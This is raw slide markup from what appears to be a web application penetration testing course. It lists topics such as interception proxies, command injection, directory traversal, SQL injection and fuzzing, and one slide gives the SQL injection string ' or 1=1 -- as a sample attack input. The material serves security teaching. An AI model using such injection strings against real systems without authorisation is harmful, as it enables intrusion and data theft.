                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery Cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3670300" y="707084"/>
            <a:ext cx="1892300" cy="5846116"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1192"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 1192"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1192"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 1192 w 1192"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="1192" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="2164"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="3984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2164"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="707084"/>
            <a:ext cx="3429000" cy="5922315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99FFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerability Discovery Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Creating Custom Scripts for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Python for Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Exercise: Python Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Vulnerabilities and Manual</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Verification Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Fiddler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> OWASP Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Exercise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Information Leakage &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Directory Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Directory Browsing Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection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219075" y="121920"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Understanding Web App </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability Types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61443" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="320040" y="1645920"/>
            <a:ext cx="8458200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The automated scanners we'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>ve covered so far may indicate potential flaws in target applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We need to understand in depth the types of vulnerabilities we may discover</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>And, we need to look at techniques for manually verifying discovered vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Helps reduce false positives, making our reports more accurate and actionable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>May give us a better understanding of the risks associated with a flaw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Can also lead directly to the next phase of the methodology: Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>With that in mind, much of the rest of this session is devoted to in-depth analysis of various types of web app flaws, including techniques for manual verification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We will also discuss Burp Suite, a great collection of tools for manual verification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic"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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Fuzzing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62467" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Fuzzing is a common term used during testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>All security testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Fuzzing is sending random or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>psuedo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>-random strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Via the various inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web testing mainly uses attack strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>' or 1=1 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We then examine the results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Examining Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reviewing the results are mandatory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tools can help but this depends on us</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We look for differences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deviations from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>normal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Work from a known good</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look for errors and status code changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Response size is also helpful</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31299504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dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>FuzzDB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63491" name="Content Placeholder 2"/>
          <p:cNvSpPr>
